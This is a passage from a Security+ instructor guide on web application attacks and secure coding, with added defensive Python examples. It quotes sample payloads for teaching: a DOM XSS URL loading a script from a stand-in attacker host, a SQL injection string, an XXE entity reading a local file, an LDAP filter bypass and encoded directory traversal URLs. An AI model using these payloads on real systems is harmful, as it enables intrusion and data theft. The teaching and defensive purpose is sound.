https://trusted.foo/messages?user=james

2. The attacker crafts a URL to modify the parameters of a script that the server will
return, such as:

https://trusted.foo/messages#user=James%3Cscript%20src%3D%22https%3A%2F%2Fbadsite.foo%2Fhook.js%22%3E%3C%2Fscript%3E

3. The server returns a page with the legitimate DOM script embedded, but
containing the parameter:

James<script src="https://badsite.foo/hook.js"></script>

4. The browser renders the page using the DOM script, adding the text "James" to
the header, but also executing the hook.js script at the same time.

Teaching
Structured Query Language Injection Attacks Tip
Make sure students
Attacks such as session replay, CSRF, and DOM-based XSS are client-side attacks. can identify SQL code
This means that they execute arbitrary code on the browser. A server-side attack and suspicious query
causes the server to do some processing or run a script or query in a way that is not strings.

esson 1 Summarizing Secure Application Concepts | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
378 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

authorized by the application design. Most server-side attacks depend on some kind of
in ection attack.
Where an overflow attack works against the way a process performs memory
management, an injection attack exploits some unsecure way in which the application
processes requests and queries. For example, an application might allow a user to view
his or her profile with a database query that should return the single record for that
one user's profile. An application vulnerable to an injection attack might allow a threat
actor to return the records for all users, or to change fields in the record when they are
only supposed to be able to read them.

A web application is likely to use Structured Query Language (SQL) to read and write
information from a database. The main database operations are performed by SQL
statements for selecting data (SELECT), inserting data (INSERT), deleting data (DELETE),
and updating data (UPDATE). In a SQL injection attack, the threat actor modifies
one or more of these four basic functions by adding code to some input accepted by
the app, causing it to execute the attacker's own set of SQL queries or parameters.
If successful, this could allow the attacker to extract or insert information into the
database or execute arbitrary code on the remote system using the same privileges as
the database application (owasp.org/www-community/attacks/SQL_Injection).

For example, consider a web form that is supposed to take a name as input. If the user
enters "Bob", the application runs the following query:

SELECT * FROM tbl_user WHERE username = 'Bob'

If a threat actor enters the string ' or 1=1-- and this input is not sanitized, the following
malicious query will be executed:

SELECT * FROM tbl_user WHERE username = '' or 1=1--#

The logical statement 1=1 is always true, and the --# string turns the rest of the
statement into a comment, making it more likely that the web application will parse
this modified version and dump a list of all users.
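The tbl_user lookup above, as an added example that is not part of the CompTIA guide: the same query built first by string concatenation and then as a parameterized query, run in Python against an in-memory SQLite table. The table columns and the two sample rows are constructed for the demonstration.

```python
"""Added example: the guide's tbl_user lookup built two ways.

The table layout and rows are constructed sample data, not from the guide.
"""
import sqlite3

# Constructed sample data standing in for the guide's tbl_user table.
SAMPLE_USERS = [("Bob", "bob@example.test"), ("Alice", "alice@example.test")]


def make_db() -> sqlite3.Connection:
    """Create an in-memory database holding a tbl_user table and the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tbl_user (username TEXT, email TEXT)")
    conn.executemany("INSERT INTO tbl_user VALUES (?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_query_text(username: str) -> str:
    """Build the WHERE clause by concatenation, so the input becomes SQL syntax."""
    return "SELECT * FROM tbl_user WHERE username = '" + username + "'"


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """Run the concatenated query: the input ' or 1=1-- returns every row."""
    return conn.execute(vulnerable_query_text(username)).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, username: str) -> list:
    """Bind the input as a parameter: it can only ever be compared as a value."""
    query = "SELECT * FROM tbl_user WHERE username = ?"
    return conn.execute(query, (username,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_query_text("' or 1=1--"))
    print("concatenated:  ", lookup_vulnerable(db, "' or 1=1--"))
    print("parameterized: ", lookup_parameterized(db, "' or 1=1--"))
```

With the parameterized form the database engine receives the SQL text and the value separately, so the quote and the comment marker in the input are never interpreted as syntax; the same principle is what makes stored procedures with typed parameters a safer way to query.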

XML and LDAP Injection Attacks
Show Slide(s): XML and LDAP Injection Attacks

Teaching Tip: Make sure students can identify XML and LDAP syntax.

An injection attack can target other types of protocol where the application takes user
input to construct a query, filter, or document.

Extensible Markup Language (XML) Injection

Extensible Markup Language (XML) is used by apps for authentication and
authorizations, and for other types of data exchange and uploading. Data submitted
via XML with no encryption or input validation is vulnerable to spoofing, request
forgery, and injection of arbitrary data or code. For example, an XML External Entity
(XXE) attack embeds a request for a local resource (owasp.org/www-community/
vulnerabilities/XML_External_Entity_(XXE)_Processing).

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY bar SYSTEM "file:///etc/config">]>
<bar>&bar;</bar>

This defines an entity named bar that refers to a local file path (the SYSTEM keyword
is what makes the entity an external reference rather than a literal string). A successful
attack will return the contents of /etc/config as part of the response.
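One way to stop the payload above before a parser can act on it, as an added example that is not from the guide: refuse any untrusted XML that declares a DOCTYPE or an entity, using only the standard library's expat bindings. The XXE document is reproduced as the test input; the safe sample document is constructed.

```python
"""Added example: reject XML carrying a DTD or entity declarations before parsing."""
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat

# The guide's XXE payload, reproduced here as the input to reject.
XXE_PAYLOAD = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY bar SYSTEM "file:///etc/config">]>\n'
    "<bar>&bar;</bar>"
)


class UnsafeXML(ValueError):
    """Raised when untrusted XML declares a DTD or an entity."""


def check_xml_safety(document: str) -> bool:
    """Return True only if the document declares no DOCTYPE and no entities.

    expat reports the DOCTYPE before it reads any entity inside it, so the
    document is refused before an external reference could be resolved.
    Documents that are not well-formed raise expat.ExpatError.
    """
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE {name!r} declared; DTDs are not accepted")

    def on_entity(name, is_parameter, value, base, system_id, public_id, notation):
        raise UnsafeXML(f"entity {name!r} declared (system id {system_id!r})")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(document, True)
    return True


def parse_untrusted(document: str) -> ET.Element:
    """Gate on the safety check, then parse with ElementTree as usual."""
    check_xml_safety(document)
    return ET.fromstring(document)


if __name__ == "__main__":
    try:
        check_xml_safety(XXE_PAYLOAD)
    except UnsafeXML as exc:
        print("rejected:", exc)
    print(parse_untrusted("<user><name>Bob</name></user>").find("name").text)
```

Rejecting the DTD outright is the same policy the defusedxml package applies by default; it is simpler and safer than trying to allow "harmless" entities, because billion-laughs style expansion attacks use only internal entities.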


Lightweight Directory Access Protocol (LDAP) Injection

The Lightweight Directory Access Protocol (LDAP) is another example of a query
language. LDAP is specifically used to read and write network directory databases. A
threat actor could exploit either unauthenticated access or a vulnerability in a client
app to submit arbitrary LDAP queries. This could allow accounts to be created or
deleted, or for the attacker to change authorizations and privileges (owasp.org/www-
community/attacks/LDAP_Injection).

LDAP filters are constructed from name=value attribute pairs delimited by
parentheses and the logical operators AND and OR. Adding filter parameters as
unsanitized input can bypass access controls. For example, if a web form authenticates
to an LDAP directory with the valid credentials Bob and Pa$$w0rd, it may construct a
query such as this from the user input:

(&(username=Bob)(password=Pa$$w0rd))

Both parameters must be true for the login to be accepted. If the form input is not
sanitized, a threat actor could bypass the password check by entering a valid username
plus an LDAP filter string, such as bob)(&)). This causes the password filter to be
dropped for a condition that is always true:

(&(username=Bob)(&))
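The filter bypass above, as an added example that is not from the guide: user input escaped under the RFC 4515 rules before it is placed in the filter, beside the unsafe concatenation, with a small tokenizer that lists which terms the outer AND group actually contains in each case. The attribute names follow the guide's example; the function and variable names are the example's own.

```python
"""Added example: escaping LDAP filter values, and showing what an unescaped
filter really evaluates."""

# Characters that carry meaning inside an LDAP filter value (RFC 4515).
FILTER_ESCAPES = {"\\": "\\5c", "*": "\\2a", "(": "\\28", ")": "\\29", "\x00": "\\00"}


def escape_filter_value(value: str) -> str:
    """Replace filter metacharacters with their \\XX hex escapes."""
    return "".join(FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_login_filter_unsafe(username: str, password: str) -> str:
    """Concatenate raw input, as the vulnerable form in the text does."""
    return f"(&(username={username})(password={password}))"


def build_login_filter(username: str, password: str) -> str:
    """Escape both values so parentheses in the input stay inside the value."""
    return (f"(&(username={escape_filter_value(username)})"
            f"(password={escape_filter_value(password)}))")


def and_terms(filt: str):
    """Return (terms, trailing): the direct terms of the outer (&...) group and
    whatever text is left over once that group has closed.

    Directory servers read a filter up to the balancing parenthesis; what
    follows is ignored, which is how the password term gets dropped.
    """
    if not filt.startswith("(&"):
        raise ValueError("expected an AND filter")
    terms, depth, start = [], 1, 0
    for i in range(2, len(filt)):
        ch = filt[i]
        if ch == "(":
            depth += 1
            if depth == 2:
                start = i
        elif ch == ")":
            depth -= 1
            if depth == 1:
                terms.append(filt[start:i + 1])
            elif depth == 0:
                return terms, filt[i + 1:]
    return terms, ""


if __name__ == "__main__":
    for build in (build_login_filter_unsafe, build_login_filter):
        filt = build("bob)(&))", "x")
        print(filt, "->", and_terms(filt))
```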

Directory Traversal and Command Injection Attacks
Show Slide(s): Directory Traversal and Command Injection Attacks

Directory traversal is another type of injection attack performed against a web server.
The threat actor submits a request for a file outside the web server's root directory by
submitting a path to navigate to the parent directory (../). This attack can succeed if the
input is not filtered properly and access permissions on the file are the same as those
on the web server directory.

The threat actor might use a canonicalization attack to disguise the nature of the
malicious input. Canonicalization refers to the way the server converts between the
different methods by which a resource such as a file path or URL may be represented
and submitted to the simplest (or canonical) method used by the server to process the
input. Examples of encoding schemes include HTML entities and character set percent
encoding (ASCII and Unicode). An attacker might be able to exploit vulnerabilities in
the canonicalization process to perform code injection or facilitate directory traversal.
For example, to perform a directory traversal attack, the attacker might submit a URL
such as:

http://victim.foo/?show=../../../../etc/config

A limited input validation routine would prevent the use of the string ../ and refuse the
request. If the attacker submitted the URL using the encoded version of the characters,
he or she might be able to circumvent the validation routine:

http://victim.foo/?show=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/config
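The two URLs above, as an added example that is not from the guide: the limited "../" substring check beside a check that decodes the parameter exactly once and then resolves it against the document root. The document root /var/www/html and the show parameter handling are assumptions for the example.

```python
"""Added example: naive traversal check versus canonical path resolution."""
from pathlib import PurePosixPath
from typing import Optional
from urllib.parse import unquote, urlsplit

WEB_ROOT = PurePosixPath("/var/www/html")   # assumed document root


def naive_is_allowed(show: str) -> bool:
    """The limited routine from the text: looks for the literal string '../'."""
    return "../" not in show


def canonical_path(show: str) -> Optional[PurePosixPath]:
    """Decode the parameter, then walk its segments against WEB_ROOT.

    Returns the canonical path, or None if any '..' would climb above the root.
    """
    decoded = unquote(show)            # %2e%2e%2f becomes ../ here, exactly once
    stack = []
    for segment in PurePosixPath(decoded).parts:
        if segment in ("/", "."):
            continue                   # a leading slash or '.' adds nothing
        if segment == "..":
            if not stack:
                return None            # attempt to leave the document root
            stack.pop()
            continue
        stack.append(segment)
    return WEB_ROOT.joinpath(*stack)


def resolve_request(url: str) -> Optional[PurePosixPath]:
    """Pull the raw 'show' parameter out of the URL and canonicalize it.

    The query string is split by hand so the value is decoded exactly once:
    letting parse_qs decode it and then decoding again in canonical_path
    would turn %252e into '.', which is a further canonicalization bypass.
    Returns None when the parameter is absent or the path escapes the root.
    """
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key == "show":
            return canonical_path(value)
    return None


if __name__ == "__main__":
    encoded = "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/config"
    print("naive check passes encoded input:", naive_is_allowed(encoded))
    print("canonical check result:", canonical_path(encoded))
    print(resolve_request("http://victim.foo/?show=docs%2Fguide.txt"))
```

The order matters: decode first, canonicalize second, and only then compare against the root. A check that runs on the raw percent-encoded string is exactly what the second URL in the text is designed to slip past.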
A command injection attack attempts to cause the server to run OS shell commands
and return the output to the browser. As with directory traversal, the web server
should normally be able to prevent commands from operating outside of the server's
directory root and to prevent commands from running with any other privilege level
than the web "guest" user (who is normally granted only very restricted privileges).
A successful command injection attack would find some way of circumventing this
security or find a web server that is not properly configured.


Server-Side Request Forgery
Show Slide(s): Server-Side Request Forgery

Teaching Tip: Note that SSRF encompasses a number of techniques. Make sure students
can distinguish SSRF and CSRF/XSRF. With XSRF, the browser is tricked into submitting
a malicious request; with SSRF, it is the server that appears to make the request, either
to another service running on the same host, or to a different server.

A server-side request forgery (SSRF) causes the server application to process an arbitrary
request that targets another service, either on the same host or a different one (owasp.
org/www-community/attacks/Server_Side_Request_Forgery). SSRF exploits both the lack
of authentication between the internal servers and services (implicit trust) and weak
input validation, allowing the attacker to submit unsanitized requests or API parameters.

A web application takes API input via a URL or as data encoded in HTTP response
headers. The web application is likely to use a standard library to read (parse) the URL
or response headers. Many attacks depend on exploits against specific parsing
mechanisms in standard libraries for web servers, such as Apache or IIS, and web
application programming languages and tools, such as the curl library, Java, and PHP.
SSRF can also use XML injection to exploit weaknesses in XML document parsing.

One type of SSRF uses HTTP request splitting or CRLF injection. The attacker crafts
a malicious URL or request header targeting the server's API. The request contains
extra line feeds, which may be coded in some non-obvious way. Unless the web server
strips these out when processing the URL, it will be tricked into performing a second
HTTP request.

SSRF attacks are often targeted against cloud infrastructure where the web server
is only the public-facing component of a deeper processing chain. A typical web
application comprises multiple layers of servers, with a client interface, middleware
logic layers, and a database layer. Requests initiated from the client interface (a web
form) are likely to require multiple requests and responses between the middleware
and back-end servers. These will be implemented as HTTP header requests and
responses between each server's API. SSRF is a means of accessing these internal
servers by causing the public server to execute requests on them. While with CSRF an
exploit only has the privileges of the client, with SSRF the manipulated request is made
with the server's privilege level.

Server-side request forgery example. (Images 1 .com.)


SSRF encompasses a very wide range of potential exploits and targets, some of
which include:

• Reconnaissance—a response may contain metadata describing the type and
configuration of internal servers. SSRF can also be used to port scan within the
internal network.

• Credential stealing—a response may contain an API key that the internal servers use
between themselves.

• Unauthorized requests—the server-initiated request might change data or access a
service in an unauthorized way.

• Protocol smuggling—despite initially being carried over HTTP, the SSRF might target
an internal SMTP or FTP server. That server may be configured in a best-effort
way, strip the HTTP header, and do its best to return the response to the SMTP or
FTP request.
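The input validation side of SSRF, as an added example that is not from the guide: the checks a public-facing component can apply to a URL or header value before making a request on a client's behalf, covering the CRLF injection, protocol smuggling and internal-address cases described above. The allowlisted hostnames are assumptions.

```python
"""Added example: validating a URL before a server-side fetch."""
import ipaddress
from typing import Tuple
from urllib.parse import urlsplit

# Assumed allowlist of back-end hosts this server is permitted to call.
ALLOWED_HOSTS = {"api.internal.example", "images.example"}


def validate_outbound_url(url: str) -> Tuple[bool, str]:
    """Return (allowed, reason) for a URL the server is asked to request."""
    # CR/LF must be rejected before parsing: urlsplit silently strips them,
    # which is exactly how a split request would slip through unnoticed.
    if "\r" in url or "\n" in url:
        return False, "CR/LF in URL (request splitting)"
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not permitted (protocol smuggling)"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None                      # a name, not an IP literal
    if ip is not None and (ip.is_private or ip.is_loopback or ip.is_link_local
                           or ip.is_reserved or ip.is_multicast):
        return False, f"IP literal {host} points at a non-public address"
    if host not in ALLOWED_HOSTS:
        return False, f"host {host!r} is not on the allowlist"
    return True, "ok"


def validate_header_value(value: str) -> bool:
    """Header values forwarded to an internal API must not contain line breaks."""
    return "\r" not in value and "\n" not in value


if __name__ == "__main__":
    for candidate in ("https://api.internal.example/v1/users",
                      "http://127.0.0.1/",
                      "ftp://api.internal.example/report",
                      "https://api.internal.example/\r\nX-Injected: 1"):
        print(repr(candidate), "->", validate_outbound_url(candidate))
```

The IP-literal test alone is not enough: a hostname on the allowlist can still resolve to an internal address, so the allowlist of names, and ideally a resolver that refuses private answers, is what carries the control. Authentication between the internal services (the implicit-trust problem above) is the complementary defense.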


Review Activity:
Indicators of Web Application Attacks
Answer the following questions:

1. You are reviewing access logs on a web server and notice repeated requests
for URLs containing the strings %3C and %3E. Is this an event that should be
investigated further, and why?

Those strings represent percent encoding for HTML tag delimiters (< and >). This could
be an attempt to inject a script so should be investigated.

2. You have been asked to monitor baseline API usage so that a rate limiter
value can be set. What is the purpose of this?

A rate limiter will mitigate denial of service (DoS) attacks on the API, where a malicious
entity generates millions of spurious requests to block legitimate ones. You need to
establish a baseline to ensure continued availability for legitimate users by setting the
rate limit at an appropriate level.

3. How does a replay attack work in the context of session hijacking?

The attacker captures some data, such as a cookie, used to log on or start a session
legitimately. The attacker then resends the captured data to re-enable the connection.

4. How does a clickjacking attack work?

The attacker inserts an invisible layer into a trusted web page that can intercept or
redirect input without the user realizing.

5. What is a persistent XSS attack?

Where the attacker inserts malicious code into the back-end database used to serve
content to the trusted site.

6. How might an attacker exploit a web application to perform a shell
injection attack?

The attacker needs to find a vulnerable input method, such as a form control or URL or
script parser, that will allow the execution of OS shell commands.

7. You are improving back-end database security to ensure that requests
deriving from front-end web servers are authenticated. What general class
of attack is this designed to mitigate?

Server-side request forgery (SSRF) causes a public server to make an arbitrary request
to a back-end server. This is made much harder if the threat actor has to defeat
an authentication or authorization mechanism between the web server and the
database server.


Topic 14C
Summarize Secure Coding Practices

EXAM OBJECTIVES COVERED
2.3 Summarize secure application development, deployment, and automation concepts
3.2 Given a scenario, implement host or application security solutions

Teaching Tip: Having covered the main attack types, this topic looks at coding
techniques that mitigate those risks.

While you may not be taking on direct development duties on major projects, you will
often be called upon to make updates to scripts, or make a quick judgment whether a
script could be vulnerable and should be evaluated more closely for weaknesses. Being
able to summarize secure coding practices will help you to work effectively as part of a
DevSecOps team.

Secure Coding Techniques
Show Slide(s): Secure Coding Techniques

Teaching Tip: Check that students understand the difference between input validation
and output encoding. Input validation occurs when a script takes data passed to it by
some other process. This could be an API request, user form data, and so on. Input
validation can be performed by client-side code, server-side code, or both. Output
encoding occurs when a script passes data to another script. For example, when a
server passes parameters to a DOM script running in the browser, output encoding
ensures it isn't passing any malicious "<script>" contents. Output encoding avoids the
assumption that input will have been sanitized already.

The security considerations for new programming technologies should be well
understood and tested before deployment. One of the challenges of application
development is that the pressure to release a solution often trumps any requirement
to ensure that the application is secure. A legacy software design process might be
heavily focused on highly visible elements, such as functionality, performance, and
cost. Modern development practices use a security development life cycle running in
parallel or integrated with the focus on software functionality and usability. Examples
include Microsoft's SDL (microsoft.com/en-us/securityengineering/sdl) and the OWASP
Software Assurance Maturity Model (owasp.org/www-project-samm) and Security
Knowledge Framework (owasp.org/www-project-security-knowledge-framework).
OWASP also collates descriptions of specific vulnerabilities, exploits, and mitigation
techniques, such as the OWASP Top 10 (owasp.org/www-project-top-ten).

Some of the most important coding practices are input validation, output encoding,
and error handling.

Input Validation

A primary vector for attacking applications is to exploit faulty input validation. Input
could include user data entered into a form or URL passed by another application as
a URL or HTTP header. Malicious input could be crafted to perform an overflow attack
or some type of script or SQL injection attack. To mitigate this risk, all input methods
should be documented with a view to reducing the potential attack surface exposed by
the application. There must be routines to check user input, and anything that does not
conform to what is required must be rejected.

Normalization and Output Encoding

Where an application accepts string input, the input should be subjected to
normalization procedures before being accepted. Normalization means that a string
is stripped of illegal characters or substrings and converted to the accepted character
set. This ensures that the string is in a format that can be processed correctly by the
input validation routines.

When user-generated strings are passed through different contexts in a web
application (between HTTP, JavaScript, PHP, and SQL, for instance), each with
potentially different canonicalization schemes, it is extremely difficult to ensure that
characters that would facilitate script injection by XSS have been rendered safe.
Output encoding means that the string is re-encoded safely for the context in which
it is being used. For example, a web form might perform input validation at the client,
but when it reaches the server, a PHP function performs output encoding before
composing an SQL statement. Similarly, when a string is delivered from a database
using SQL, a JavaScript function would perform output encoding to render the string
using safe HTML entities (cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).
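Normalization, allowlist input validation and per-context output encoding, as an added example that is not from the guide. It uses the username from the DOM XSS walkthrough and the stored-XSS post from the earlier topic as its inputs, so it also shows what output encoding would have done to that post. The username character set and the three encoding contexts (HTML, JavaScript string, URL query) are the example's own choices.

```python
"""Added example: normalize, validate, then encode for the output context."""
import html
import json
import re
import unicodedata
from urllib.parse import quote

# Allowlist for a username: letters, digits and a few punctuation marks.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")

# The malicious post from the stored XSS walkthrough, reproduced as sample input.
MALICIOUS_POST = ('Check out this amazing <a href="https://trusted.foo">website</a>'
                  '<script src="https://badsite.foo/hook.js"></script>.')


def normalize(text: str) -> str:
    """Canonical form first: NFKC folds look-alike forms (full-width letters,
    ligatures) into their plain equivalents; control characters are dropped."""
    text = unicodedata.normalize("NFKC", text)
    text = "".join(ch for ch in text if unicodedata.category(ch)[0] != "C")
    return text.strip()


def validate_username(text: str) -> str:
    """Allowlist validation of the normalized string; anything else is rejected."""
    text = normalize(text)
    if not USERNAME_RE.fullmatch(text):
        raise ValueError("username contains characters outside the allowed set")
    return text


def encode_for_html(text: str) -> str:
    """HTML body or attribute context: <, >, &, and quotes become entities."""
    return html.escape(text, quote=True)


def encode_for_js(text: str) -> str:
    """JavaScript string context: a JSON literal with <, > and & hex-escaped,
    so a '</script>' inside the data cannot terminate the script block."""
    return (json.dumps(text).replace("<", "\\u003c")
            .replace(">", "\\u003e").replace("&", "\\u0026"))


def encode_for_url(text: str) -> str:
    """Query-string context: percent-encode everything but unreserved characters."""
    return quote(text, safe="")


def render_post(author: str, body: str) -> str:
    """Encode at the point of output, regardless of what validation ran earlier."""
    return f"<h2>{encode_for_html(author)}</h2><p>{encode_for_html(body)}</p>"


if __name__ == "__main__":
    print(validate_username(" \uff4aames\t"))
    print(render_post("James", MALICIOUS_POST))
    print(encode_for_js("</script><script>alert(1)</script>"))
```

Validation and encoding are not interchangeable: the username is validated because it has a narrow legitimate form, while the post body is free text that cannot be validated against a pattern and so must be encoded for the context it is written into.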

Server-Side versus Client-Side Validation
Show Slide(s): Server-Side versus Client-Side Validation

A web application (or any other client-server application) can be designed to perform
code execution and input validation locally (on the client) or remotely (on the server).
An example of client-side execution is a document object model (DOM) script to
render the page using dynamic elements from user input. Applications may use both
techniques for different functions. The main issue with client-side validation is that
the client will always be more vulnerable to some sort of malware interfering with the
validation process. The main issue with server-side validation is that it can be time-
consuming, as it may involve multiple transactions between the server and client.
Consequently, client-side validation is usually restricted to informing the user that
there is some sort of problem with the input before submitting it to the server. Even
after passing client-side validation, the input will still undergo server-side validation
before it can be posted (accepted). Relying on client-side validation only is poor
programming practice.

Web Application Security
Show Slide(s): Web Application Security

Interaction Opportunity: Students can use browser inspector tools (Network tab) to
view cookies set by sites plus request and response headers and scripts.

With web applications, special attention must be paid to secure cookies and options for
HTTP response header security.

Secure Cookies

Cookies can be a vector for session hijacking and data exposure if not configured
correctly (developer.mozilla.org/en-US/docs/Web/HTTP/Cookies). Some of the key
parameters for the Set-Cookie header are:

• Avoid using persistent cookies for session authentication. Always use a new cookie
when the user reauthenticates.

• Set the Secure attribute to prevent a cookie being sent over unencrypted HTTP.

• Set the HttpOnly attribute to make the cookie inaccessible to document object
model/client-side scripting.

• Use the SameSite attribute to control from where a cookie may be sent, mitigating
request forgery attacks.

Response Headers

A number of security options can be set in the response header returned by the
server to the client (owasp.org/www-project-secure-headers). While it should seem
like a straightforward case of enabling all these, developers are often constrained by
compatibility and implementation considerations between different client browser
and server software types and versions. Some of the most important security-relevant
header options are:

• HTTP Strict Transport Security (HSTS)—forces browser to connect using HTTPS only,
mitigating downgrade attacks, such as SSL stripping.

• Content Security Policy (CSP)—mitigates clickjacking, script injection, and other
client-side attacks. Note that X-Frame-Options and X-XSS-Protection provide
mitigation for older browser versions, but are now deprecated in favor of CSP.

• Cache-Control—sets whether the browser can cache responses. Preventing caching
of data protects confidential and personal information where the client device might
be shared by multiple users.
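The cookie attributes and response headers from the two lists above, as an added example that is not from the guide: a session cookie built with the standard library's cookie module, and an audit function run over a weak header set and a hardened one. Both header sets are constructed for the example, and the particular CSP and HSTS values are assumptions rather than recommendations for any specific site.

```python
"""Added example: a hardened Set-Cookie value and a response-header audit."""
from http.cookies import SimpleCookie
from typing import Dict, List


def build_session_cookie(token: str) -> str:
    """Set-Cookie value for a non-persistent session cookie.

    No Expires or Max-Age, so it dies with the browser session; Secure,
    HttpOnly and SameSite cover the remaining three points in the list above.
    """
    jar = SimpleCookie()
    jar["session"] = token
    morsel = jar["session"]
    morsel["path"] = "/"
    morsel["secure"] = True
    morsel["httponly"] = True
    morsel["samesite"] = "Strict"
    return morsel.OutputString()


def audit_response_headers(headers: Dict[str, str]) -> List[str]:
    """Return a list of findings; an empty list means every check passed."""
    h = {name.lower(): value for name, value in headers.items()}
    findings = []
    if "max-age=" not in h.get("strict-transport-security", ""):
        findings.append("HSTS header missing or without max-age")
    if "content-security-policy" not in h:
        findings.append("Content-Security-Policy missing")
    if "no-store" not in h.get("cache-control", ""):
        findings.append("Cache-Control does not prevent caching of the response")
    cookie = h.get("set-cookie", "")
    attrs = {part.strip().split("=")[0].lower() for part in cookie.split(";")[1:]}
    for needed in ("secure", "httponly", "samesite"):
        if needed not in attrs:
            findings.append(f"Set-Cookie lacks the {needed} attribute")
    if "x-xss-protection" in h or "x-frame-options" in h:
        findings.append("legacy X-* header present; CSP supersedes it")
    return findings


# Constructed header sets: a weak response and its hardened counterpart.
WEAK_RESPONSE = {
    "Content-Type": "text/html",
    "Set-Cookie": "session=abc123; Path=/",
    "X-XSS-Protection": "1; mode=block",
}
HARDENED_RESPONSE = {
    "Content-Type": "text/html",
    "Set-Cookie": build_session_cookie("abc123"),
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'",
    "Cache-Control": "no-store",
}

if __name__ == "__main__":
    print(HARDENED_RESPONSE["Set-Cookie"])
    for name, response in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(name, audit_response_headers(response))
```

The audit is deliberately about presence and a few key directives; a real policy check would also inspect the CSP source lists, but the missing-header cases are what the browser inspector exercise in the Interaction Opportunity will most often turn up.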

Data Exposure and Memory Management
Show Slide(s): Data Exposure and Memory Management

Data exposure is a fault that allows privileged information (such as a token, password,
or personal data) to be read without being subject to the appropriate access controls.
Applications must only transmit such data between authenticated hosts, using
cryptography to protect the session. When incorporating encryption in your code, it's
important to use encryption algorithms and techniques that are known to be strong,
rather than creating your own.

Error Handling

A well-written application must be able to handle errors and exceptions gracefully.
This means that the application performs in a controlled way when something
unpredictable happens. An error or exception could be caused by invalid user input, a
loss of network connectivity, another server or process failing, and so on. Ideally, the
programmer will have written a structured exception handler (SEH) to dictate what
the application should then do. Each procedure can have multiple exception handlers.
Some handlers will deal with anticipated errors and exceptions; there should also be
a catchall handler that will deal with the unexpected. The main goal must be for the
application not to fail in a way that allows the attacker to execute code or perform
some sort of injection attack. One infamous example of a poorly written exception
handler is the Apple GoTo bug (nakedsecurity.sophos.com/2014/02/24/anatomy-of-a-goto-fail-apples-ssl-bug-explained-plus-an-unofficial-patch).

Another issue is that an application's interpreter may default to a standard handler
and display default error messages when something goes wrong. These may reveal
platform information and the inner workings of code to an attacker. It is better for an
application to use custom error handlers so that the developer can choose the amount
of information shown when an error is caused.

Technically, an error is a condition that the process cannot recover from, such as the system
running out of memory. An exception is a type of error that can be handled by a block of
code without the process crashing. Note that exceptions are still described as generating
error codes/messages, however.
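The two handler styles described above, as an added example that is not from the guide: a request wrapper with a handler for the anticipated error class and a catch-all for everything else, beside a "default" handler that returns the interpreter's traceback to the caller. The sample handler, the response shape and the incident identifier are the example's own conventions.

```python
"""Added example: structured exception handling versus a leaky default handler."""
import logging
import traceback
import uuid
from typing import Any, Callable, Tuple

log = logging.getLogger("app")


class ValidationError(Exception):
    """Anticipated failure: the caller sent something the handler rejects."""


def parse_quantity(raw: str) -> int:
    """Sample request handler: accepts an integer from 1 to 100."""
    if not raw.isdigit() or not 0 < int(raw) <= 100:
        raise ValidationError("quantity must be an integer from 1 to 100")
    return int(raw)


def leaky_handle(handler: Callable[..., Any], *args) -> Tuple[int, Any]:
    """What a default handler amounts to: the stack trace goes to the client,
    complete with file paths, interpreter details and source context."""
    try:
        return 200, handler(*args)
    except Exception:
        return 500, traceback.format_exc()


def safe_handle(handler: Callable[..., Any], *args) -> Tuple[int, Any]:
    """Structured handling: a specific message for the anticipated error, a
    generic message plus a correlation id for the unexpected. The detail the
    operator needs goes to the log, keyed by that id, not to the client."""
    try:
        return 200, handler(*args)
    except ValidationError as exc:
        return 400, {"error": "invalid input", "detail": str(exc)}
    except Exception:
        incident = uuid.uuid4().hex
        log.error("unhandled exception, incident %s\n%s", incident, traceback.format_exc())
        return 500, {"error": "internal error", "incident": incident}


if __name__ == "__main__":
    print(safe_handle(parse_quantity, "42"))
    print(safe_handle(parse_quantity, "abc"))
    print(safe_handle(lambda: 1 / 0))
    print(leaky_handle(lambda: 1 / 0)[1])
```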

Memory Management
Many arbitrary code attacks depend on the target application having faulty memory
management procedures. This allows the attacker to execute his or her own code in
the space marked out by the target application. There are known unsecure practices
for memory management that should be avoided and checks for processing untrusted
input, such as strings, to ensure that it cannot overwrite areas of memory.


Secure Code Usage
Show Slide(s): Secure Code Usage

Teaching Tip: The use of off-the-shelf packages such as WordPress, Moodle, or Joomla!
can lead to an easily exploitable website if the relevant security bulletins and
configuration advisories are not followed. The Magecart syndicate is a good example
(trustwave.com/en-us/resources/blogs/spiderlabs-blog/anyone-can-check-for-magecart-with-just-the-browser).

Developing code to perform some function is hard work, so developers will often
look to see if someone else has done that work already. A program may make use of
existing code in the following ways:

• Code reuse—using a block of code from elsewhere in the same application or from
another application to perform a different function or perform the same function
in a different context. The risk here is that the copy and paste approach causes
the developer to overlook potential vulnerabilities (perhaps the function's input
parameters are no longer validated in the new context).

• Third-party library—using a binary package (such as a dynamic link library) that
